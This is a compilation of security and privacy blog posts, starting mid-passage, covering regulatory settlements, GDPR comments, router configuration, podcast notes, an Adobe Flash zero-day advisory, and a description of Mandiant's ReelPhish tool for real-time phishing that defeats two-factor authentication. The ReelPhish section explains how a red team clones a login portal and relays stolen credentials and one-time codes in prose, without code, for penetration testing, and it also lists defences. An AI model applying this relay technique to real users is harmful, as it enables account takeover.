The FTC alleges that Explore Talent collected the same range of personal information from users who indicated they were under age 13 as from other users, and made no attempts to provide COPPA-required notice or obtain parental consent before collecting such information. Once registered on, all profiles, including children’s, became publicly visible, and registered adults were able to “friend” and exchange direct private messages with registered children. The FTC alleges that, between 2014 and 2016, more than 100,000 children registered on As part of the settlement, Explore Talent agreed to (1) pay a $500,000 civil penalty (which was suspended upon payment of $235,000), (2) comply with COPPA in the future and (3) delete the information it previously collected from children.

ReelPhish: A Real-Time Two-Factor Phishing Tool

Social Engineering and Two-Factor Authentication

Social engineering campaigns are a constant threat to businesses because they target the weakest chain in security: people. A typical attack would capture a victim’s username and password and store it for an attacker to reuse later. Two-Factor Authentication (2FA) or Multi-Factor Authentication (MFA) is commonly seen as a solution to these threats.

2FA adds an extra layer of authentication on top of the typical username and password. Two common 2FA implementations are one-time passwords and push notifications. One-time passwords are generated by a secondary device, such as a hard token, and tied to a specific user. These passwords typically expire within 30 to 60 seconds and cannot be reused. Push notifications involve sending a prompt to a user’s mobile device and requiring the user to confirm their login attempt. Both of these implementations protect users from traditional phishing campaigns that only capture username and password combinations.

Real-Time Phishing

While 2FA has been strongly recommended by security professionals for both personal and commercial applications, it is not an infallible solution. 2FA implementations have been successfully defeated using real-time phishing techniques. These phishing attacks involve interaction between the attacker and victims in real time.

A simple example would be a phishing website that prompts a user for their one-time password in addition to their username and password. Once a user completes authentication on the phishing website, they are presented with a generic “Login Successful” page and the one-time password remains unused but captured. At this point, the attacker has a brief window of time to reuse the victim’s credentials before expiration.

Social engineering campaigns utilizing these techniques are not new. There have been reports of real-time phishing in the wild as early as 2010. However, these types of attacks have been largely ignored due to the perceived difficulty of launching such attacks. This article aims to change that perception, bring awareness to the problem, and incite new solutions.

Explanation of Tool

To improve social engineering assessments, we developed a tool – named ReelPhish – that simplifies the real-time phishing technique. The primary component of the phishing tool is designed to be run on the attacker’s system. It consists of a Python script that listens for data from the attacker’s phishing site and drives a locally installed web browser using the Selenium framework. The tool is able to control the attacker’s web browser by navigating to specified web pages, interacting with HTML objects, and scraping content.

The secondary component of ReelPhish resides on the phishing site itself. Code embedded in the phishing site sends data, such as the captured username and password, to the phishing tool running on the attacker’s machine. Once the phishing tool receives information, it uses Selenium to launch a browser and authenticate to the legitimate website. All communication between the phishing web server and the attacker’s system is performed over an encrypted SSH tunnel.

Victims are tracked via session tokens, which are included in all communications between the phishing site and ReelPhish. This token allows the phishing tool to maintain states for authentication workflows that involve multiple pages with unique challenges. Because the phishing tool is state-aware, it is able to send information from the victim to the legitimate web authentication portal and vice versa.


We have successfully used ReelPhish and this methodology on numerous Mandiant Red Team engagements. The most common scenario we have come across is an externally facing VPN portal with two-factor authentication. To perform the social engineering attack, we make a copy of the real VPN portal’s HTML, JavaScript, and CSS. We use this code to create a phishing site that appears to function like the original.

To facilitate our real-time phishing tool, we embed server-side code on the phishing site that communicates with the tool running on the attacker machine. We also set up a SSH tunnel to the phishing server. When the authentication form on the phishing site is submitted, all submitted credentials are sent over the tunnel to the tool on the attacker’s system. The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal. Figure 1 shows this process in action.

Figure 1: ReelPhish Flow Diagram

We have seen numerous variations of two-factor authentication on VPN portals. In some instances, a token is passed in a “secondary password” field of the authentication form itself. In other cases, the user must respond to a push request on a mobile phone. A user is likely to accept an incoming push request after submitting credentials if the phishing site behaved identically to the real site.

In some situations, we have had to develop more advanced phishing sites that can handle multiple authentication pages and also pass information back and forth between the phishing web server and the tool running on the attacking machine. Our script is capable of handling these scenarios by tracking a victim’s session on the phishing site and associating it with a particular web browser instance running on the attacker’s system. Figure 1 shows a general overview of how our tool would function within an attack scenario.

We are publicly releasing the tool on the FireEye GitHub Repository. Feedback, pull requests, and issues can also be submitted to the Git repository.


Do not abandon 2FA; it is not a perfect solution, but it does add a layer of security. 2FA is a security mechanism that may fail like any other, and organizations must be prepared to mitigate the impact of such a failure.

Configure all services protected by 2FA to minimize attacker impact if the attacker successfully bypasses the 2FA protections. Lowering maximum session duration will limit how much time an attacker has to compromise assets. Enforcing a maximum of one concurrent session per user account will prevent attackers from being active at the same time as the victim. If the service in question is a VPN, implement strict network segmentation. VPN users should only be able to access the resources necessary for their respective roles and responsibilities. Lastly, educate users to recognize, avoid, and report social engineering attempts.

By releasing ReelPhish, we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism. This tool is meant to aid security professionals in performing a thorough penetration test from beginning to end.

During our Red Team engagements at Mandiant, getting into an organization’s internal network is only the first step. The tool introduced here aids in the success of this first step. However, the overall success of the engagement varies widely based on the target’s internal security measures. Always work to assess and improve your security posture as a whole. Mandiant provides a variety of services that can assist all types of organizations in both of these activities.

Singapore PDPC Issues Response to Public Feedback Regarding Data Protection Consultation

On February 1, 2018, the Singapore Personal Data Protection Commission (the “PDPC”) published its response to feedback collected during a public consultation process conducted during the late summer and fall of 2017 (the “Response”). During that public consultation, the PDPC circulated a proposal relating to two general topics: (1) the relevance of two new alternative bases for collecting, using and disclosing personal data (“Notification of Purpose” and “Legal or Business Purpose”), and (2) a mandatory data breach notification requirement. The PDPC invited feedback from the public on these topics.

“Notification of Purpose” as a new basis for an organization to collect, use and disclose personal data.

In its consultation, the PDPC solicited views on “Notification of Purpose” as a possible new basis for data processing. In its Response, the PDPC noted that it intends to amend its consent framework to incorporate the “Notification of Purpose” approach (also called “deemed consent by notification”), which will essentially provide for an opt-out approach.

Under that approach, organizations may collect, use and disclose personal data merely by providing (1) some form of appropriate notice of purpose in situations where there is no foreseeable adverse impact on the data subjects, and (2) a mechanism to opt out. The PDPC will issue guidelines on what would be considered “not likely to have any adverse impact.” The approach will also require organizations to undertake risk and impact assessments to determine any such possible adverse impacts. Where the risk assessments determine a likely adverse impact, the approach may not be used. Also, the “Notification of Purpose” approach may not be used for direct marketing purposes.

The PDPC will not specify how organizations will be required to notify individuals of purpose, and will leave it to organizations to determine the most appropriate method under the circumstances, which might include a general notification on a website or social media page. The notification must, however, include information on how to opt out or withdraw consent from the collection, use or disclosure. The PDPC also said it would provide further guidance on situations where opt-out would be challenging, such as where large volumes of personal data are collected by sensors, for example.

“Legitimate Interest” as a basis to collect, use or disclose personal data.

In its consultation, the PDPC also sought feedback on a proposed “Legal and Business Purpose” ground for processing personal information. In its Response, the PDPC said that based on the feedback, it intends to adopt this concept under the EU term “legitimate interest.” The PDPC will provide guidance on the legal and business purposes that come within the ambit of “legitimate interest,” such as fraud prevention. “Legitimate interest” will not cover direct marketing purposes. The intent behind this ground for processing is to enable organizations to collect, use and disclose personal data in contexts where there is a need to protect legitimate interests that will have economic, social, security or other benefits for the public or a section thereof, and the processing should not be subject to consent. The benefits to the public or a section thereof must outweigh any adverse impacts to individuals. Organizations must conduct risk assessments to determine whether they can meet this requirement. Organizations relying on “legitimate interest” must also disclose this fact and make available a document justifying the organization’s reliance on it.

Mandatory Data Breach Notification

Regarding the 72-hour breach notification requirement it proposed in the consultation, the PDPC acknowledged in its Response that the affected organization may need time to determine the veracity of a suspected data breach incident. Thus, it stated that the time frame for the breach notification obligation only commences when the affected organization has determined that a breach is eligible for reporting. This means that when an affected organization first becomes aware that an information security incident may have occurred, the organization still has time to conduct a digital forensic investigation to determine precisely what has happened, including whether any breach of personal information security has happened at all, before the clock begins to run on the 72-hour breach notification deadline. From that time, the organization must report the incident to the affected individuals and the PDPC as soon as practicable, but still within 72 hours.

The PDPC requires that the digital forensic investigation be completed within 30 days. However, it still allows that the investigation may continue for more than 30 days if the affected organization has documented reasons why the time taken to investigate was reasonable and expeditious.

Both the Centre for Information Policy and Leadership and Hunton & Williams LLP filed public comments in the PDPC’s consultation.

How to configure a Mikrotik router as DHCP-PD Client (Prefix delegation)

Over time more and more IPS provide IPv6 addresses to the router (and the clients behind it) via DHCP-PD. To be more verbose, that’s DHCPv6 with Prefix delegation delegation. This allows the ISP to provide you with more than one subnet, which allows you to use multiple networks without NAT. And forget about NAT and IPv6 – there is no standardized way to do it, and it will break too much.  The idea with PD is also that you can use normal home routers and cascade them, which requires that each router provides a smaller prefix/subnet to the next router. Everything should work without configuration – that was at least the plan of the IETF working group.

Anyway let’s stop with the theory and provide some code. In my case my provider requires my router to establish a pppoe tunnel, which provides my router an IPv4 automatically. In my case the config looks like this:

/interface pppoe-client add add-default-route=yes disabled=no interface=ether1vlanTransitModem name=pppoeDslInternet password=XXXX user=XXXX

For IPv6 we need to enable the DHCPv6 client with following command:

/ipv6 dhcp-client add interface=pppoeDslInternet pool-name=poolIPv6ppp use-peer-dns=no

But a check with

/ipv6 dhcp-client print

will only show you that the client is “searching…”. The reason for this is that you most likely block incoming connections from the Internet – If you don’t filter –> bad boy! :-). You need to allow DHCP replies from the server.

/ipv6 firewall filter add chain=input comment="DHCPv6 server reply" port=547 protocol=udp src-address=fe80::/10

Now you should see something like this

In this case we got a /60 prefix delegated from the ISP, which counts for 16 /64 subnets. The last step you need is to configure the IP addresses on your internal networks. Yes, you could just statically add the IP addresses, but if the provider changes the subnet after an disconnect, you need to reconfigure it again. Its better configure the router to dynamically assign the IP addresses delegated to the internal interfaces. You just need to call following for each of your internal interfaces:

/ipv6 address add from-pool=poolIPv6ppp interface=vlanInternal

Following command should show the currently assigned prefixes to the various internal networks

/ipv6 address print

Hey, IPv6 is not that complicated. 🙂

Put Your Dockers On – Business Security Weekly #72

This week, Michael and Paul interview Vik Desai, Managing Director at Accenture! Matt Alderman and Asif Awan of Layered Insight join Michael and Paul for another interview! In the news, we have updates from BehavioSec, RELX, DISCO, Logikcull, and more on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

HHS Announces $3.5 Million Settlement with Fresenius Medical Care

On February 1, 2018, the Department of Health and Human Services’ Office for Civil Rights (“OCR”) announced a settlement with dialysis clinic operator, Fresenius Medical Care (“Fresenius”). Fresenius will pay OCR $3.5 million to settle claims brought under Health Insurance Portability and Accountability Act rules, alleging that lax security practices led to five breaches of electronic protected health information.

The breaches, which occurred at Fresenius facilities in Alabama, Arizona, Florida, Georgia and Illinois from February 23 to July 18, 2012, form the basis of OCR’s claims. According to the settlement, these breaches led to the exposure of 521 patients’ health data.

In announcing the settlement, OCR stated that Fresenius “failed to conduct an accurate and thorough risk analysis of potential risk and vulnerabilities to the confidentiality, integrity, and availability” of protected health data at its locations. Although Fresenius did not admit fault in the settlement, the company agreed to complete a risk analysis and risk management plan, update facility access controls, develop an encryption report and update employees on new policies and procedures.

Stay Classy – Application Security Weekly #04

This week, Keith and Paul discuss OWASP Application Security Verification Standard! In the news, Intel warns Chinese companies of chip flaw before U.S. government, bypassing CloudFair using Internet-wide scan data, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

CIPL Submits Comments to Article 29 WP’s Updated BCR Working Documents

On January 18, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP submitted formal comments to the Article 29 Working Party (the “Working Party”) on its updated Working Documents, which include a table with the elements and principles found in Binding Corporate Rules (“BCRs”) and Processor Binding Corporate Rules (the “Working Documents”). The Working Documents were adopted by the Working Party on October 3, 2017, for public consultation.

In its comments, CIPL recommends several changes or clarifications the Working Party should incorporate in its final Working Documents.

Comments Applicable to Both Controller and Processor BCRs

  • The Working Documents should clarify that, with respect to the BCR application, providing confirmation of assets to pay for damages resulting from a BCR-breach by members outside of the EU does not extend to fines under the GDPR. Additionally, the Working Party should clarify that access to sufficient assets, such as a guarantee from the parent company, is sufficient to provide valid confirmation.
  • The Working Document should confirm that bringing existing BCRs in line with the GDPR requires updating the BCRs in line with the Working Documents and sending the updated BCRs to the respective supervisory authority.
  • The Working Party should clarify that companies currently in the process of BCR approval through a national mutual recognition procedure should be treated the same as fully approved BCRs, and must simply update the BCRs in line with the GDPR.

Comments Applicable to BCR Controllers (“BCR-C”) Only

  • The Working Party should clarify that companies with approved BCR-C do not have to implement additional controller-processor contracts reiterating the processors’ obligations under Article 28(3) of the GDPR with respect to internal transfers between controllers and processors within the same group of companies.
  • The Working Party should also clarify that BCRs only need to include the requirement that individuals benefitting from third-party beneficiary rights be provided with the information as required by Article 13 and 14 of the GDPR. The BCRs do not need to restate the actual elements of these provisions.

Comments Applicable to BCR Processors Only

  • The Working Documents should emphasize that an individual’s authority to enforce the duty of a processor to cooperate with the controller is limited to situations where cooperation is required to allow the individual to exercise their rights or to make a complaint.
  • The Working Party should remove the requirement that processors must open their facilities for audit, and clarify that the completion of questionnaires or the provision of independent audit reports are sufficient to meet the requirements of Article 28(3)(h). Furthermore, the Working Documents should make clear that certifications can be used in accordance with Article 28(5) to demonstrate compliance with Article 28(3)(h).

General BCR Recommendations

  • The Working Party should clarify that BCR-approved companies are deemed adequate and transfers between two BCR-approved companies (either controllers or processors) or transfers from any controller (not BCR-approved) to a BCR-approved controller are permitted.
  • The status for existing and UK-approved BCRs post-Brexit should be clarified, along with the future role of the UK ICO with regard to BCRs and the situation for new BCR applications post-Brexit.
  • The Working Party should highlight the importance of BCR interoperability with other transfer mechanisms, and propose that the EU Commission consider and promote such interoperability through appropriate means and processes.
  • The Working Party should recommend the EU Commission consider third-party BCR approval by approved certification bodies or “Accountability Agents” and/or a self-certified system for BCRs, which would streamline the BCR approval process and facilitate faster processing times.

To read the above recommendations in more detail, along with all of CIPL’s other recommendations on BCRs, view the full paper.

CIPL’s comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 90 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

Ten things you may reveal during job interview (Response to Forbes Article)

Ten things you may reveal during job interview (Response to Forbes Article)

In continuation to my recent articles on preparation for the interview, and few pointers to make perform better during the interview, I stumbled on an article at Forbes - Ten Things Never, Ever to reveal in a job interview by Liz Ryan. I agree with some of the pointers she voiced, but few might hurt the employee/employer relationship in the long run or may even be considered borderline unethical. This blog-post is an attempt to share my humble opinion while having experience as an entrepreneur & employee. Please read it with a pinch of salt, and do share your comments.

As per Forbes article, ten things to keep to yourself (and my opinions alongwith),

  1. The fact that you got fired from your last job -- or any past job.
    Yes, this is irrelevant and can be avoided in the interview.
    But, if your firing included a legal case against you, or something that the new employer may find in the background check, or police verification; it's better to come clean at the start than being embarrassed later.

  2. The fact that your last manager (or any past manager) was a jerk, a bully, a lousy manager or an idiot, even if all those things were true.
    No need to mention that. No one likes to interview a candidate that bitches of the old colleagues or managers.
    It may only be acceptable to an extent if it has resulted in harassment case and you have taken the "justifiable" decision to leave the firm based on how they treated you.

  3. The fact that you are desperate for a job. Some companies will be turned off by this disclosure, and others will use it as a reason to low-ball you.
    I agree here. Keep the leverage of negotiating the terms with yourself & don't expose all your cards.

  4. The fact that you feel nervous or insecure about parts of the job if you're applying for. You don't want to be cocky and say "I can do this job in my sleep!" but you also don't want to express the idea that you are worried about walking into the new job. Don't worry! Everyone is worried about every new job, until you figure out that everyone is faking it anyway so you may as well fake it, too.
    Okay, I do agree with the pointer here, but if you are insecure or feeling nervous than you might as well give this position a rethought. Pursue a role you are confident to manage and don't manipulate the interviewer by showing "confidence" when you have no idea of its role & responsibilities. Don't express the nervous jitters of the new job, nor be cocky with overconfidence. But, be true to yourself and the employer if the assignment is well in your forte.

  5. The fact that you had a clash or conflict with anybody at a past job or that you got written up or put on probation. That's no one's business but yours.
    It is on the same grounds as you being fired in your last job or your relationship with your x-manager. Chose sensibly as there's no black & white answer to handling this situation without knowing the complete context. There can be scenarios when you may want to tell the interviewer (example: if your old company may well be the client of the new firm, and you may be allocated to this project (TRUE STORY))

  6. The fact that you have a personal issue going on that could create scheduling difficulty down the road. Keep that to yourself unless you already know that you need accommodation, and you know what kind of accommodation you need. Otherwise, button your lip. Life takes its own turns. Who knows what will happen a few months from now?
    Okay, this I don't agree 100% as being an entrepreneur, I would like my employee or hiring candidate to be right to me if they have an ongoing commitment or something that might come up. Most of the companies hire candidates with few weeks of the probation period, or a company may even fire you if you intentionally kept your planned "engagement" with the firm.
    There is a change in the outlook of companies, and they would appreciate if you keep them in the loop of ongoing personal issues (briefly) so they can expect the right amount of deliverables. Else, your performance and scheduling may well slide off the track which can cause you problems in the long run.

  7. The fact you're pregnant, unless you already telling people you don't know well (like the checker at the supermarket). A prospective employer has no right to know the contents of your uterus. It is none of their business.
    I have a different opinion on this, and my answer depends on the which trimester you are in. If you are in the first trimester, and by God's grace doing well, telling the employer is your choice. Keep in mind that if the employer is unaware of your health status; they may not be able to judge the kind of workload which is "healthy" for you or that you have a medical reason for not doing overtime etc.
    Being in the 2nd trimester, you have to be careful, and you should tell the employer about your condition. It will not be well appreciated that after joining for a month, you may go on maternity leave. I mean employer may as well have commitments on the ongoing projects and deadlines.
    And if you are in the 3rd trimester, I would recommend you to enjoy your pregnancy and don't stress about looking out for new job, projects and deadlines. You have a much more significant responsibility and full-time job for few months.

  8. The fact that this job pays a lot more than the other jobs you've held. That information is not relevant and will only hurt you.
    Yes, I agree. Every situation and employer must have their range of compensation, and the only thing you have to consider is if that's enough for you; independently of your last paycheck or other jobs.

  9. The fact that you are only planning to remain in your current city for another year or some other period of time. That fact alone will cause many companies not to hire you. They want to retain the right to fire you for any reason or no reason, at any moment -- but they can't deal with the fact that you have your own plans, too -- and that people don't always take a job with the intention of staying in the job forever.
    If you are planning to stay in the city for a year, and then move; let the employer know about it. Understand your relationship with the employer is mutual, and you would expect the same from it. What if the employer is closing the office in six months and the hire you "hiding this fact", and then let you go in six months. I mean we don't have to lie to each other to hire the perfect person or land the ideal job.

  10. The fact that you know you are overqualified for the job you're interviewing for, and that your plan is to take the job and quickly get promoted to a better job. For some reason, many interviewers find this information off-putting. I have been to countless HR gatherings where I heard folks complaining about "entitled" or "presumptuous" job applicants who had the nerve to say "This job is just a stepping stone for me." How dare they!
    Without a doubt, I agree. But if you are overqualified for the job, or you think you may as well get bored, think again before saying yes to the employer. Refer my previous articles on preparation and performance.

In general when I appear for the interview, or if I interview someone; I prefer to be straightforward of my current conditions, and expect the same from the employer. The working relationship is essential and must not start with hiding information that can impact your performance. You will spend 1/3rd of your life at your workplace, and I don't think you want to kick off my keeping the critical facts hidden. Think before you hide something - whether it will shock your employer, or surprise them and how well they would react to it, is disclosed.

Employee or Employer, both have their commitments and deadlines. The person taking your interviews, or the one managing you have to know if you have some hiccups along the way else their performance may also impact because of you. So, think of these pointers again and do share what you feel is necessary to set the right expectations.

Cheers, and best wishes.

This article shares my opinions, and by no means an offence to the Forbes article. Please take it with a pinch of salt.

Hopefully Intel is working on hardware solution of…

Hopefully Intel is working on hardware solution of this flaw. Obvious solution is adding fully isolated device that performs scheduled encryption for all sensitive information, (that does not used for computation anyway), then decryption is done only when request is longer then access time of meltdown.. Such solution will help not only for Meltdown, but also for any attempt to get password without touching keyboard.

It Was Wide Open – Paul’s Security Weekly #546

This week, InfoSecWorld speakers Mark Arnold & Will Gragido join us for an interview! John Strand of Black Hills Information Security joins us for the Technical Segment on MITRE! In the news, we have updates from Discord, Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:

Visit for all the latest episodes!

Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) – Threat Attribution, Attack Scenario and Recommendations

On Jan. 31, KISA (KrCERT) published an advisory about an Adobe Flash zero-day vulnerability (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the vulnerability exists in Adobe Flash Player and earlier versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.

FireEye began investigating the vulnerability following the release of the initial advisory from KISA.

Threat Attribution

We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.

In the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.

Attack Scenario

Analysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.


Adobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.

FireEye Solutions Detections

FireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our FireEye Customer Communities post.

CIPL Submits Comments to Article 29 WP’s Proposed Guidelines on Transparency

On January 29, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP submitted formal comments to the Article 29 Working Party (the “Working Party”) on its Guidelines on Transparency (the “Guidelines”). The Guidelines were adopted by the Working Party on November 28, 2017, for public consultation.

CIPL acknowledges and appreciates the Working Party’s emphasis on user-centric transparency and the use of layered notices to achieve full disclosure, along with its statements on the use of visualization tools and the importance of avoiding overly technical or legalistic language in providing transparency. However, CIPL also identified several areas in the Guidelines that would benefit from further clarification or adjustment.

In its comments to the Guidelines, CIPL recommends several changes or clarifications the Working Party should incorporate in its final guidelines relating to elements of transparency under the EU GDPR, information to be provided to the data subject, information related to further processing, exertion of data subjects’ rights, and exceptions to the obligation to provide information.

Some key recommendations include:

  • Clear and Concise yet Comprehensive Disclosure: The Guidelines should more clearly acknowledge the tension between asking for clear and concise notices and including all of the information required by the GDPR and recommended by the Working Party. CIPL believes Articles 13 and 14 of the GDPR already require sufficient information, and the risk-based approach gives organizations the opportunity to prioritize which information should be provided.
  • Consequences of Processing: The Working Party should amend their “best practice” recommendation that controllers “spell out” what the most important consequences of the processing will be. The Working Party should clarify that in providing information beyond what is required under the GDPR, controllers must be able to exercise their judgement on whether and how to provide such information.
  • Use of Certain Qualifiers: CIPL recommends removing the Working Party’s statement that qualifiers such as “may,” “might,” “some,” “often” and “possible” be avoided in privacy statements. Sometimes these terms are more appropriate than others. For instance, saying certain processing “will occur” is not as accurate as “may occur” when it is not certain whether the processing will in fact occur.
  • Proving Identity Orally: The Guidelines state that information may be provided orally to a data subject on request, provided that their identity is proven by other non-oral means. CIPL believes the Working Party should revise this statement, as voice recognition or verbal identity confirming questions and answers are valid mechanisms of proving one’s identity orally.
  • Updates to Privacy Notices: The Working Party should remove its suggestion that any changes to an existing privacy statement or notice must be notified to individuals. CIPL believes communications to individuals should be required only for changes having a significant impact.
  • Reminder Notices: The Working Party should remove the recommendation that the controller send reminder notices to individuals when processing occurs on an ongoing basis, even when they have already received the information. This is not required by the GDPR and individuals may feel overwhelmed or frustrated by such constant reminders. Individuals should, however, be able to easily pull such information from an accessible location.
  • New Purposes of Processing: The Guidelines should amend the statement and example suggesting that in addition to providing individuals new information in connection with a new purpose of processing, the controller, as a matter of best practice, should re-provide the individual with all of the information under the notice requirement received previously. CIPL believes this could potentially distract individuals from focusing on any new key information which could undermine transparency, and it should be up to the data controller to determine whether the re-provision of information would be useful.
  • Active Steps: The Working Party should clarify its statement that individuals should not have to take “active steps” to obtain information covered by Articles 13 and 14 of the GDPR, to the effect that clicking links to access notices would not constitute taking an “active step.”
  • Compatibility Analyses: The Working Party states that in connection with processing for compatibility purposes, organizations should provide individuals with “further information on the compatibility analysis carried out under Article 6(4).” CIPL believes such a requirement undermines transparency, as the information would provide little benefit to an individual’s understanding of the organization’s data processing, and burden organizations who have to reform, redact, compose and deliver such information.
  • Disproportionate Efforts: The Guidelines should acknowledge that the disproportionate efforts clause (Article 14(5)(b)) can be relied upon by controllers for purposes other than archiving in the public interest, scientific or historical research purposes or for statistical purposes (e.g., confirming identity or preventing fraud). The Working Party should also revise its statement that controllers who rely on Article 14(5)(b) should have to carry out a balancing exercise to assess the effort of the controller to provide the information versus the impact on the individual if not provided with the information. The GDPR does not require this and the disproportionality at issue refers to the disproportionality between the effort associated with the provision of such information and the intended data use.

To read the above recommendations in more detail along with all of CIPL’s other recommendations on transparency, view the full paper.

CIPL’s comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 90 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

CIPL Submits Comments to Article 29 WP’s Proposed Guidelines on Consent

On January 29, 2018, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP submitted formal comments to the Article 29 Working Party (the “Working Party”) on its Guidelines on Consent (the “Guidelines”). The Guidelines were adopted by the Working Party on November 28, 2017, for public consultation.

CIPL acknowledges and appreciates the Working Party’s elaboration on some of the consent-related requirements, such as providing information relevant to consent in layered format and the acknowledgment of both the push and pull models for providing such information. Additionally, CIPL welcomes the clear acknowledgement that controllers have the flexibility to develop consent experiences suitable to their organizations. However, CIPL also identified several areas in the Guidelines that would benefit from further clarification or adjustment.

In its comments to the Guidelines, CIPL recommends several changes or clarifications the Working Party should incorporate in its final guidelines relating to the elements of valid consent, rules on obtaining explicit consent, the interaction between consent and other processing grounds in the EU GDPR, and specific areas of concern such as scientific research and consent obtained under the Data Protection Directive.

Some key recommendations include:

  • Status of Consent: The Working Party should revise its statement that when initiating processing, controllers must always consider whether consent is the appropriate ground. No processing ground, including consent, is privileged over the other.
  • Imbalance of Power: The Guidelines should clarify what constitutes an imbalance of power outside of cases involving public authorities and employers, and emphasize that such imbalances occur in only narrow situations where the individual truly does not have a meaningful opportunity to consent.
  • Conditionality: The Working Party should clarify that incentivizing an individual (e.g., by reducing the generally applicable fee or providing additional features or services) to consent to additional processing should not be deemed inappropriate pressure preventing an individual from exercising their free will.
  • Informed: While it should be easy to identify directly what information relates to the consent sought, the Guidelines should clarify that it may be important to include such information in context with other information to provide a full picture to the individual and safeguard transparency.
  • Unambiguous Indication of Wishes: Consent must be expressed by a clear affirmative act and the Guidelines note that “merely proceeding with a service” cannot be regarded as such an act. The Working Party should clarify that “merely proceeding with a service” refers to a situation where no affirmative action is taking place at all. Completing a free-text field or other similar action may constitute a valid explicit affirmative act.
  • Obtaining Explicit Consent: The Guidelines should clarify that mechanisms for “regular” consent, as defined in the GDPR, may also meet the “explicit consent” standard.
  • Withdrawing Consent: The Working Party should clarify that withdrawal of consent should not automatically result in deletion of data processed prior to withdrawal. This may be contrary to the individual’s wishes, potentially interfere with other data subject rights (e.g., portability), and may even conflict with other regulations such as those regulating clinical trials or research.
  • Alternative Processing Grounds: The Guidelines should clarify that it is possible to have multiple grounds for one and the same processing, and if consent is withdrawn but another ground is available and the conditions for the validity of the alternative ground are met, the controller may continue to process the data.
  • Scientific Research: The Working Party should clarify that scientific research goes beyond medical research and also encompasses private sector R&D. Additionally, the Guidelines should revise the recommendation that providing a comprehensive research plan is a way to compensate for a lack of purpose specification related to research, as disclosures of such plans would carry risks for organizations’ intellectual property rights, undermine innovation and diminish transparency.
  • Consent under the Directive: The Working Party should revise its statement that all consents obtained under the Directive that do not meet the GDPR standard must be re-obtained. Organizations should only have to re-obtain such consents if there is a material change in the processing and its purposes, the consents do not comply with the GDPR rules on conditionality (Article 7(4)), or the requirements of Article 8(1) on processing children’s data have not been met.

To read the above recommendations in more detail, along with all of CIPL’s other recommendations on consent, view the full paper.

CIPL’s comments were developed based on input by the private sector participants in CIPL’s ongoing GDPR Implementation Project, which includes more than 90 individual private sector organizations. As part of this initiative, CIPL will continue to provide formal input about other GDPR topics the Working Party prioritizes.

Facebook Publishes Privacy Principles and Announces Introduction of Privacy Center

On January 28, 2018, Facebook published its privacy principles and announced that it will centralize its privacy settings in a single place. The principles were announced in a newsroom post by Facebook’s Chief Privacy Officer and include:

  • “We give you control of your privacy.”
  • “We help people understand how their data is used.”
  • “We design privacy into our products from the outset.”
  • “We work hard to keep your information secure.”
  • “You own and can delete your information.”
  • “Improvement is constant.”
  • “We are accountable.”

In conjunction with the publication of the privacy principles, Facebook also announced the creation of a new privacy center and an educational video campaign for its users that focuses on advertising, reviewing and deleting old posts, and deleting accounts. The videos will appear in users’ news feeds and will be refreshed throughout the year.

Declaring War on Cyber Terrorism…or Something Like That

This post is co-authored by Deana Shick, Eric Hatleback and Leigh Metcalf

Buzzwords are a mainstay in our field, and "cyberterrorism" currently is one of the hottest. We understand that terrorism is an idea, a tactic for actor groups to execute their own operations. Terrorists are known to operate in the physical world, mostly by spreading fear with traditional and non-traditional weaponry. As information security analysts, we also see products where "terrorists" are ranked in terms of sophistication, just like any other cyber threat actor group. But how does the definition of "terrorism" change when adding the complexities of the Internet? What does the term "cyber terrorism" actually mean?

We identified thirty-seven (37) unique definitions of "cyber terrorism" drawn from academic and international-relations journals, the web, and conference presentations. These definitions date back as far as 1998, with the most recent being published in 2016. We excluded any circular definitions based on the findings in our set. We broke down these definitions into their main components in order to analyze and compare definitions appropriately. The definitions, as a whole, broke into the following thirteen (13) categories, although no single definition included all of them at once:

  • Against Computers: Computers are a necessary target of the action.
  • Criminals: Actions performed are criminal acts, according to the relevant applicable law.
  • Fear: The action is intended to incite fear in the victims.
  • Hacking: The attempt to gain unauthorized access into a targeted network.
  • Religion: Religious tenants are a motivator to perform actions.
  • Socially Motivated: Social constructs motivate to perform action on objectives.
